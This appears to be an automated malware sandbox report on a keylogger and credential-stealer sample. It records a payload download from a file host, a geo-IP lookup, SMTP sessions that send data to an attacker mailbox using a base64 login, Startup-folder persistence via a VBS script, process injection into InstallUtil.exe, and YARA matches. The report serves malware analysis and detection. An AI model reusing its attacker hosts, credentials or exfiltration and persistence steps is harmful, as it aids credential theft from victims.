2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49789	194.15.112.248	443	7824	C:\Users\user\AppData\Roaming\Ticks.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:23:19 UTC	186	OUT	GET /Xkqu HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Host: oshi.at Connection: Keep-Alive
2025-01-14 13:23:20 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 14 Jan 2025 13:23:20 GMT Content-Type: application/octet-stream Content-Length: 1043976 Connection: close Content-Disposition: attachment; filename=dJXL.dat ETag: "c0d64ecd447d49a630f4bac00aee85af" Last-Modified: Mon, 13 Jan 2025 23:40:46 GMT Accept-Ranges: bytes
2025-01-14 13:23:20 UTC	3766	IN	Data Raw: de af 27 6b 6c 49 5a 78 12 95 f0 06 60 84 5b f1 4e ed f1 ec 3d 15 ef 25 29 a6 d2 f1 02 8d 35 b8 28 db 8b 68 60 47 41 02 f9 75 da ec 63 dd 90 c1 8c de 12 c9 d6 83 7a 1a 2d 28 7e 99 00 1c 09 11 3a 87 65 bd f9 98 be 51 0f 55 19 9a fe be 14 b8 06 5a 75 81 95 8f f3 39 67 1a dc 80 3c f6 02 c9 d3 ef 3a 54 f8 57 24 61 0d 27 37 b1 49 f4 d0 f1 b8 5f a0 b0 85 bb 40 08 95 38 60 f7 93 54 2e 1e 52 fa b4 9d 1c fd 1b 8b 16 21 bb b4 d5 53 88 74 69 33 03 27 98 d7 9b 59 a7 82 71 c2 3c 56 7f e4 67 40 8c 1d 2c ff 12 01 3f 3e ac 3d de e1 b1 35 1d 15 34 b0 95 9c 5f 64 86 1e 58 9d 0c de aa e8 6b ac 0a cc a2 5c 4f 65 2c 2e 8b f4 37 d6 a5 da d5 36 50 da 57 e8 c6 4e 5c 60 3e 6d b0 51 32 25 cc be 61 a6 e3 ae 49 0e f7 9d e4 62 44 81 e4 46 2c 60 47 9f 0c 67 3e a9 51 75 7d 89 9e 9b 41 Data Ascii: 'klIZx`[N=%)5(h`GAucz-(~:eQUZu9g<:TW$a'7I_@8`T.R!Sti3'Yq<Vg@,?>=54_dXk\Oe,.76PWN\`>mQ2%aIbDF,`Gg>Qu}A
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: ec 63 22 84 66 1f 34 c3 fb e2 d6 f7 d1 6a e4 b1 36 92 75 8e 08 5a 31 35 a2 fd 9f 96 4e ec 94 7e 83 49 38 05 88 7b 08 ba 72 0a 9f 3b e0 34 18 62 3b 2a ff 0b c6 a3 30 dd 68 2a 63 ac 63 66 eb e2 8d 48 76 9b 89 ce 91 80 f8 fb ce 3c a1 09 51 48 09 a6 a4 7f 9b 2f 7e d1 d2 8d 37 4d 62 be c8 a7 82 db ba 3d 76 1d 81 2a 96 44 e6 f8 bd ac d3 4c a5 99 9c 76 57 c1 31 51 77 c3 af 02 0b 88 54 77 e4 60 2c 7c 4d 25 19 52 43 55 6d 1d 53 eb de 01 71 20 87 85 b3 a6 77 e3 af c3 e0 d2 14 8b 4e 44 b5 f3 8f 37 19 c7 c7 dc a6 36 00 b2 39 d7 d8 43 d0 7c 84 b7 d6 a8 ac 1d 27 b5 20 03 0c e1 8c 31 5d 59 bb d2 e1 9b f5 ec f5 4a ff 5e c8 18 20 b5 2b 80 57 06 8d a9 8b 3a 40 c6 f3 9b d2 d9 d2 18 83 e0 e1 f7 f7 90 a8 8f 66 1e e0 74 40 9a 35 0d d6 ac ef 89 2c d4 c9 34 94 86 02 07 8f 13 54 Data Ascii: c"f4j6uZ15N~I8{r;4b;0hccfHv<QH/~7Mb=v*DLvW1QwTw`,\|M%RCUmSq wND769C\|' 1]YJ^ +W:@ft@5,4T
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: 62 cd 10 08 7e ba aa 39 1a 78 3d 04 84 12 e9 3e 1a 93 03 19 8f 00 3a 71 cd f6 55 9b 31 92 54 8d 59 1f 7a bf 9c be 76 e1 a2 02 8a 1c 16 31 d8 6a bc 2f ec 2b 3f 66 7e 1d 94 5e 0d 77 7d c8 d8 59 f3 c6 2c 04 16 21 9c e3 6b 48 7e 3a 5e fd 19 71 ae 1d e6 c6 a3 e7 8e 36 95 7a 7a dd 3a 8f 9e 5f a6 11 79 93 88 0f 0c e3 89 a7 5e 5c 2d c1 fe 50 57 c0 8b ea 35 5d 23 ab 8e 98 43 25 89 4d fb 09 26 c6 40 63 f4 52 9b 0b 56 b0 ab ec f8 a3 51 03 e9 c4 1a 4b 0e df ae fb 8f b3 c9 30 b7 0f 93 fa 5a e8 a1 b4 d1 21 ed ed 2e 72 fc c1 73 d8 5a 42 c3 29 23 0d b9 f2 26 61 bc c2 e1 ec 56 5a 90 79 85 71 bb 0d 49 35 a7 8a 1c 7e 6c df 3e a9 62 ce 59 5b 16 ed 06 c8 ee d2 46 bf 40 ad 32 db 3d c1 53 7d 9e 3c 04 e5 f9 78 d7 5c 7b 4b ed bf d0 82 56 38 bd 21 c7 7d b9 c5 8b 90 02 f9 e9 86 80 Data Ascii: b~9x=>:qU1TYzv1j/+?f~^w}Y,!kH~:^q6zz:_y^\-PW5]#C%M&@cRVQK0Z!.rsZB)#&aVZyqI5~l>bY[F@2=S}<x\{KV8!}
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: 68 f6 96 52 37 ca af 21 3e 39 14 89 5f c7 6b 34 79 ab 8a a0 09 37 38 80 a4 e8 73 6b 1b 40 5a ed 0a 5b a6 26 17 82 ee b8 95 61 c7 ce d8 2a f1 8d 28 7e f2 7b 66 da 12 6e c4 8d e2 53 5d cf 39 9d 51 d6 e6 de 92 c9 c2 99 17 64 73 e4 15 e0 c6 74 d2 b8 ea 42 77 84 c1 6b e9 bb 29 7a 8f 24 9b 3b 9e 4f 80 3e 54 bd 03 19 6d ec b8 57 ac 6c e5 25 32 be 62 96 71 e8 54 be 98 d3 cf 9b ad 78 23 c1 69 9e aa 30 81 67 20 d0 64 f9 08 b8 39 a1 57 c4 f9 a3 7c d5 96 b7 43 ae 3a bb 0d 8b 31 27 79 c8 5b e4 d7 28 8e 34 42 2e e6 6a c9 db aa 90 ae 17 a8 57 b3 65 75 49 d5 b5 bd 27 54 a0 21 34 0e 06 3e 08 ac 65 7c 51 73 94 aa 11 e9 29 92 ee 91 df b8 bd b5 bc 11 0d 35 13 50 82 bc 92 03 26 fc ce 65 32 43 c2 f6 23 5f 96 4d aa bd 38 90 c9 46 3f 22 d7 c4 3d 46 5b 6b 10 f3 42 ec a8 44 be 52 Data Ascii: hR7!>9_k4y78sk@Z[&a*(~{fnS]9QdstBwk)z$;O>TmWl%2bqTx#i0g d9W\|C:1'y[(4B.jWeuI'T!4>e\|Qs)5P&e2C#_M8F?"=F[kBDR
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: c6 db 1c 29 5e 13 f5 42 4f f6 b4 9d d7 60 a3 cf ab 5a 18 eb 2e 40 a6 08 4f ad f7 5d ec 76 89 c2 22 62 7c 4a b2 3c b8 c5 1a b2 16 fc c4 77 f3 00 ab 26 3e 51 ca e6 99 95 36 af 3b 78 29 ab 52 cf 33 42 4b 47 81 76 20 a5 a4 b4 ae d0 ff 4f 10 46 29 4c f9 67 d3 cd 7e 64 93 77 1b f8 3c 9c e1 b5 da f1 40 ff 22 34 ef 33 f0 78 1d a8 5a 82 ae 2a a6 0f c4 fe f0 98 e0 29 f8 80 0d 6f 46 6e 98 9f 6d 87 33 0b 92 98 b9 45 b7 db e5 2f 77 4e e9 6d b4 56 29 4d cd be 82 50 2b d4 ce 86 e5 83 20 3f 63 1a 5a f4 d9 e2 0a 48 c8 d2 a1 7a 67 02 4f 90 79 3c 6f 89 93 f4 ae c2 63 95 07 21 a9 ac ff 00 a6 3d d5 28 46 b6 68 11 f3 b9 98 30 26 de 79 a6 1b 12 dd cd 12 80 00 d3 51 cc b1 eb cc 7b a8 a2 37 2e 00 5b 7f 26 a7 98 94 be 25 f2 1e 54 fc ca 26 65 98 65 ea 12 fa 5d 2c be ae 65 ec f6 9a Data Ascii: )^BO`Z.@O]v"b\|J<w&>Q6;x)R3BKGv OF)Lg~dw<@"43xZ*)oFnm3E/wNmV)MP+ ?cZHzgOy<oc!=(Fh0&yQ{7.[&%T&ee],e
2025-01-14 13:23:20 UTC	931	IN	Data Raw: d8 d9 da ba 54 1b c5 6c a5 4d 17 45 1e 50 04 98 c8 82 9c 36 76 34 32 a1 ed 86 ef af f7 9a 89 4e 68 ef 74 36 fe 74 e7 ce 28 3c d5 61 52 b0 25 b7 df 30 6f 61 d5 e6 f0 a1 34 bd a1 37 23 58 45 9e 6e 75 c9 23 53 af ef 32 84 f2 61 99 5b c1 6e db dd ec 81 40 0c 1e 44 50 75 89 6f 66 a4 02 a7 3f ba 67 2d 89 df 2e 98 94 c3 c8 26 cf e3 84 ca 09 28 3a 7c 73 63 ca 80 f0 a1 e9 bc 27 5f 5d f4 00 fa 05 b2 aa b5 f8 f0 a0 3c c6 2a a3 ae 96 2f 9c b5 2a cd 9c 0d 27 b9 9a 6d 87 b5 e4 55 a8 f4 71 cd 44 e0 c6 31 82 43 82 8e f1 b2 9d 01 03 a4 27 67 c9 fb 0a ce c2 8e de 98 a1 f8 29 bb a2 86 29 fe c1 68 5c d3 51 c3 75 40 86 8e 9e ac ce e7 fa 37 e2 77 20 fe 4f 46 cd bd 51 55 6f 8c 6a 55 79 cf 97 c9 c3 35 03 70 ce 65 d4 67 66 17 62 2c ed 92 23 90 28 3d 3e 61 1d d2 6d 94 cd f7 92 34 Data Ascii: TlMEP6v42Nht6t(<aR%0oa47#XEnu#S2a[n@DPuof?g-.&(:\|sc'_]</'mUqD1C'g))h\Qu@7w OFQUojUy5pegfb,#(=>am4
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: b4 1e d0 87 5e 37 cb bc df fa 21 9e 88 b5 79 6d c5 05 71 c2 c2 0c a6 a3 ae 0f 57 81 e2 05 a2 cc a4 ff 88 2c 4d 8d e3 1d 1a 00 e6 90 e6 51 29 ef 65 64 85 40 86 e7 f1 7b 62 d7 b2 ec ca 64 97 d0 de 1c 0a 21 f8 c1 ef 3c 8a 40 47 74 5d 5e a7 21 60 97 a4 1a 60 60 d2 b7 62 6c f4 53 7a a2 ac 41 9e 90 94 1a 48 b2 ba 3a d6 22 e3 54 c1 87 a8 51 c4 24 ad a4 6f f1 55 74 f2 6a 4a dd f8 5c f4 85 1d 46 e6 01 db 49 0e 8a 2e 25 7c 48 af 7b 9e a6 27 39 f0 19 f0 10 13 78 da e0 f3 77 2a 22 5d db 68 ae 4a c8 66 6e 2c 0d f7 4f 80 5e 07 40 39 59 76 93 bc b7 70 7e 6a 89 fc b6 cc cf b0 b7 19 18 d3 8f d1 61 26 b4 ce e8 e7 b2 5b 63 ac 02 9f 67 8c 2d 92 1a 02 5b 4e b6 f4 7f af 37 74 db 5e 15 b9 42 5b 71 3c c3 0f cf 5d 80 d5 10 01 f6 22 aa 81 86 11 11 25 d6 a1 e4 c9 21 92 7f 60 5b 3b Data Ascii: ^7!ymqW,MQ)ed@{bd!<@Gt]^!```blSzAH:"TQ$oUtjJ\FI.%\|H{'9xw*"]hJfn,O^@9Yvp~ja&[cg-[N7t^B[q<]"%!`[;
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: ac 42 69 32 52 59 e8 33 67 45 c9 28 54 0c 44 c8 c5 8a 0f a3 2f 9d 01 72 3b 2b 8d 77 a6 28 32 8e d1 dd 91 46 6d 32 ed b8 96 64 37 d0 a0 47 a8 94 f8 06 b3 bc 70 4d 82 54 89 9b 7b 63 98 ed ca bc 76 fd b4 3b 0f d4 2a 4b 35 1a df fd e4 d1 92 40 70 3c 26 b8 4e 02 f6 da 11 dc 47 ba 99 a4 2a 18 c7 18 44 cf 06 5b fc 02 19 1c a8 08 26 87 56 b8 e8 22 df 49 a2 20 72 aa 91 3e 4a 41 0a d9 cf 07 6a 9d 11 68 03 b6 41 4e 4f 18 f4 95 d7 5d 3a 9e 52 d5 0f 84 5a 21 43 ce 65 9b 04 98 ce 29 f8 c3 82 cc e8 50 89 db e3 da f0 4e 69 89 fc e7 d2 01 50 31 93 a0 c7 1d de a9 ab 64 4f 59 7d b7 94 8f 31 75 75 68 c0 97 89 f7 a4 02 fb 50 82 ed 31 3d aa bf 59 cc 68 85 d4 0a f8 17 03 20 8e f9 84 69 0e f6 0e 98 38 7e e0 7f 25 00 ad 1a 7e f9 97 db e7 7a 9b 26 b7 0f 0b 51 20 6f 78 e7 86 58 51 Data Ascii: Bi2RY3gE(TD/r;+w(2Fm2d7GpMT{cv;K5@p<&NGD[&V"I r>JAjhANO]:RZ!Ce)PNiP1dOY}1uuhP1=Yh i8~%~z&Q oxXQ
2025-01-14 13:23:20 UTC	4096	IN	Data Raw: c2 b0 40 66 a8 57 ad e5 1c ed 4a f0 e5 0a 68 6f b6 8f c7 b7 33 45 f6 6d 9d ca 2d ab 0b 44 a3 82 3c 33 be da c8 68 a0 8d df 3b fc 37 b2 aa 44 ee 96 9d 92 e8 88 f4 32 29 a8 3f 08 f7 87 e1 97 bf 78 b5 d8 0f 5e 37 85 5d 44 b2 80 97 b0 3e 9a 4a 5c 41 38 5c d4 a2 6f fa a5 19 3d 08 64 5e 35 54 71 15 f4 18 61 c8 b9 41 cc 5a 90 f1 42 21 4d 70 46 86 33 71 a1 f0 5e ac 70 fe db 2c 17 ae 45 83 69 4f 7d 22 af 82 94 38 ff 17 81 5f 61 24 2a 6c e9 2e cc f6 cf fd d0 27 0e 0a ce 9d 08 c6 5a 22 c1 aa be f0 84 6e 7b 9f 70 33 b3 f7 cc b0 0d e1 55 f9 1d 1e c4 f3 93 2b 3a a9 9b de 4a 9e 27 3a c0 f8 74 a5 2f a1 36 20 63 a8 ae ba 73 b6 59 2a ce 65 e9 98 20 b0 68 c9 36 3f e2 5e bf 26 52 f2 d7 1f 94 2d ae ab d9 31 67 12 e6 c5 ce b4 cd 78 a8 68 af e3 f0 15 bd 50 d3 30 d0 f5 4d 59 5f Data Ascii: @fWJho3Em-D<3h;7D2)?x^7]D>J\A8\o=d^5TqaAZB!MpF3q^p,EiO}"8_a$l.'Z"n{p3U+:J':t/6 csYe h6?^&R-1gxhP0MY_
2025-01-14 13:23:21 UTC	4096	IN	Data Raw: 04 9e e5 e7 bc ce 7a 88 07 a4 8e a5 b3 87 e5 7b 27 75 7f 37 8a 06 f5 4e 5a e6 6a 76 1f 23 cc 99 7b 47 58 2c f5 51 5a 78 27 61 f8 2e cd e3 e5 65 ad 45 3a 73 1e e9 ce ee d8 a8 30 99 2a cb 10 07 d3 8a 54 62 17 91 62 60 4b 40 0a e2 a0 56 09 43 fe 1b bb bc 0a 5a 88 f9 a0 1a 75 bc 23 6a 38 49 de 99 e0 7a 7b fc 6c 74 a6 b5 c4 32 e9 d2 31 7a e6 3f 9b 66 f0 7d b6 38 c9 78 90 41 83 c5 47 d7 36 90 1c 1e 08 ec c6 40 68 1d 66 eb a7 b6 89 ff 85 1e 25 d1 cc 20 1d ba c4 29 db 69 58 d1 a6 38 f2 d3 dc 5e 7d ea c7 78 c3 20 e9 ce ac 5f 24 da 98 bc 84 45 61 f5 f3 fa a5 bc e8 84 b1 ed 91 6b 19 77 18 f4 59 c8 e9 ab 3b 33 3f 42 6e e1 b6 1a ad 55 2e 4a 67 4d a3 09 f9 ff b9 f4 7f 0d 2b e1 25 e1 f0 c2 46 7f 70 f0 19 f5 14 b7 ba 43 21 de 2a 10 04 dd a2 08 5b fb b0 e9 69 19 fd 17 d5 Data Ascii: z{'u7NZjv#{GX,QZx'a.eE:s0Tbb`K@VCZu#j8Iz{lt21z?f}8xAG6@hf% )iX8^}x _$EakwY;3?BnU.JgM+%FpC![i

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49893	104.21.64.1	443	7988	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:23:38 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:23:38 UTC	859	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:23:38 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175807 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=naJE%2BvdKf8CDnH0PrVLOaV2hXaQX70zaTzkg8cMjnQ3X0yGqRmHSMtDSeUa3wN2mKzkY3JPLU%2F48eDXMjmwnWiGjBak4ciP9e%2FVZTommpyX2Cjj2PNVKUvOF2%2FyL0VflMAkaK%2FZk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901df1164f8fc358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=1616&rtt_var=1439&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=590137&cwnd=155&unsent_bytes=0&cid=644606997ddcfebb&ts=914&x=0"
2025-01-14 13:23:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 14, 2025 14:23:17.200357914 CET	587	49780	162.254.34.31	192.168.2.7	220 server1.educt.shop ESMTP Postfix
Jan 14, 2025 14:23:17.204293013 CET	49780	587	192.168.2.7	162.254.34.31	EHLO 066656
Jan 14, 2025 14:23:17.364546061 CET	587	49780	162.254.34.31	192.168.2.7	250-server1.educt.shop 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 14, 2025 14:23:17.372348070 CET	49780	587	192.168.2.7	162.254.34.31	AUTH login c2VuZHhtYWZmbGVAamVydGNvdC5zaG9w
Jan 14, 2025 14:23:17.532608032 CET	587	49780	162.254.34.31	192.168.2.7	334 UGFzc3dvcmQ6
Jan 14, 2025 14:23:17.700027943 CET	587	49780	162.254.34.31	192.168.2.7	235 2.7.0 Authentication successful
Jan 14, 2025 14:23:17.704626083 CET	49780	587	192.168.2.7	162.254.34.31	MAIL FROM:<sendxmaffle@jertcot.shop>
Jan 14, 2025 14:23:17.866174936 CET	587	49780	162.254.34.31	192.168.2.7	250 2.1.0 Ok
Jan 14, 2025 14:23:17.873682022 CET	49780	587	192.168.2.7	162.254.34.31	RCPT TO:<maffle@jertcot.shop>
Jan 14, 2025 14:23:18.036905050 CET	587	49780	162.254.34.31	192.168.2.7	250 2.1.5 Ok
Jan 14, 2025 14:23:18.037080050 CET	49780	587	192.168.2.7	162.254.34.31	DATA
Jan 14, 2025 14:23:18.196913004 CET	587	49780	162.254.34.31	192.168.2.7	354 End data with <CR><LF>.<CR><LF>
Jan 14, 2025 14:23:18.197585106 CET	49780	587	192.168.2.7	162.254.34.31	.
Jan 14, 2025 14:23:18.470266104 CET	587	49780	162.254.34.31	192.168.2.7	250 2.0.0 Ok: queued as EB76E7879B
Jan 14, 2025 14:23:44.715997934 CET	587	49932	162.254.34.31	192.168.2.7	220 server1.educt.shop ESMTP Postfix
Jan 14, 2025 14:23:44.716322899 CET	49932	587	192.168.2.7	162.254.34.31	EHLO 066656
Jan 14, 2025 14:23:44.874416113 CET	587	49932	162.254.34.31	192.168.2.7	250-server1.educt.shop 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 14, 2025 14:23:44.874761105 CET	49932	587	192.168.2.7	162.254.34.31	AUTH login c2VuZHhtYWZmbGVAamVydGNvdC5zaG9w
Jan 14, 2025 14:23:45.033493042 CET	587	49932	162.254.34.31	192.168.2.7	334 UGFzc3dvcmQ6
Jan 14, 2025 14:23:45.195302010 CET	587	49932	162.254.34.31	192.168.2.7	235 2.7.0 Authentication successful
Jan 14, 2025 14:23:45.195664883 CET	49932	587	192.168.2.7	162.254.34.31	MAIL FROM:<sendxmaffle@jertcot.shop>
Jan 14, 2025 14:23:45.356329918 CET	587	49932	162.254.34.31	192.168.2.7	250 2.1.0 Ok
Jan 14, 2025 14:23:45.356570005 CET	49932	587	192.168.2.7	162.254.34.31	RCPT TO:<maffle@jertcot.shop>
Jan 14, 2025 14:23:45.517359018 CET	587	49932	162.254.34.31	192.168.2.7	250 2.1.5 Ok
Jan 14, 2025 14:23:45.517606020 CET	49932	587	192.168.2.7	162.254.34.31	DATA
Jan 14, 2025 14:23:45.675817966 CET	587	49932	162.254.34.31	192.168.2.7	354 End data with <CR><LF>.<CR><LF>
Jan 14, 2025 14:23:45.676781893 CET	49932	587	192.168.2.7	162.254.34.31	.
Jan 14, 2025 14:23:45.947438955 CET	587	49932	162.254.34.31	192.168.2.7	250 2.0.0 Ok: queued as 6CAF378C5B
Jan 14, 2025 14:24:56.542357922 CET	49780	587	192.168.2.7	162.254.34.31	QUIT
Jan 14, 2025 14:24:56.702621937 CET	587	49780	162.254.34.31	192.168.2.7	221 2.0.0 Bye

Target ID:	6
Start time:	08:22:54
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\50201668.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\50201668.exe"
Imagebase:	0xe90000
File size:	92'279 bytes
MD5 hash:	651C185ECCB37D286F19767A716BB68E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.1424420311.0000000006E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:23:07
Start date:	14/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xf90000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2517076848.0000000000414000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	09:55:55
Start date:	14/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ticks.vbs"
Imagebase:	0x7ff63df50000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:55:56
Start date:	14/01/2025
Path:	C:\Users\user\AppData\Roaming\Ticks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Ticks.exe"
Imagebase:	0xe70000
File size:	92'279 bytes
MD5 hash:	651C185ECCB37D286F19767A716BB68E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:56:14
Start date:	14/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xfe0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.8%
Dynamic/Decrypted Code Coverage:	97%
Signature Coverage:	3%
Total number of Nodes:	299
Total number of Limit Nodes:	15

Executed Functions

Function 06DD1FAB Relevance: 4.4, Strings: 2, Instructions: 1912
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 06DD3D1E
-={, xrefs: 06DD3318

Memory Dump Source

Source File: 00000006.00000002.1424090170.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6dd0000_50201668.jbxd

Similarity

API ID:
String ID: -={$/
API String ID: 0-3609865728
Opcode ID: 2dd9ced9a472d8c1a04b24b23b73dac41d8ae8737ff81fb61ce859a34bffee42
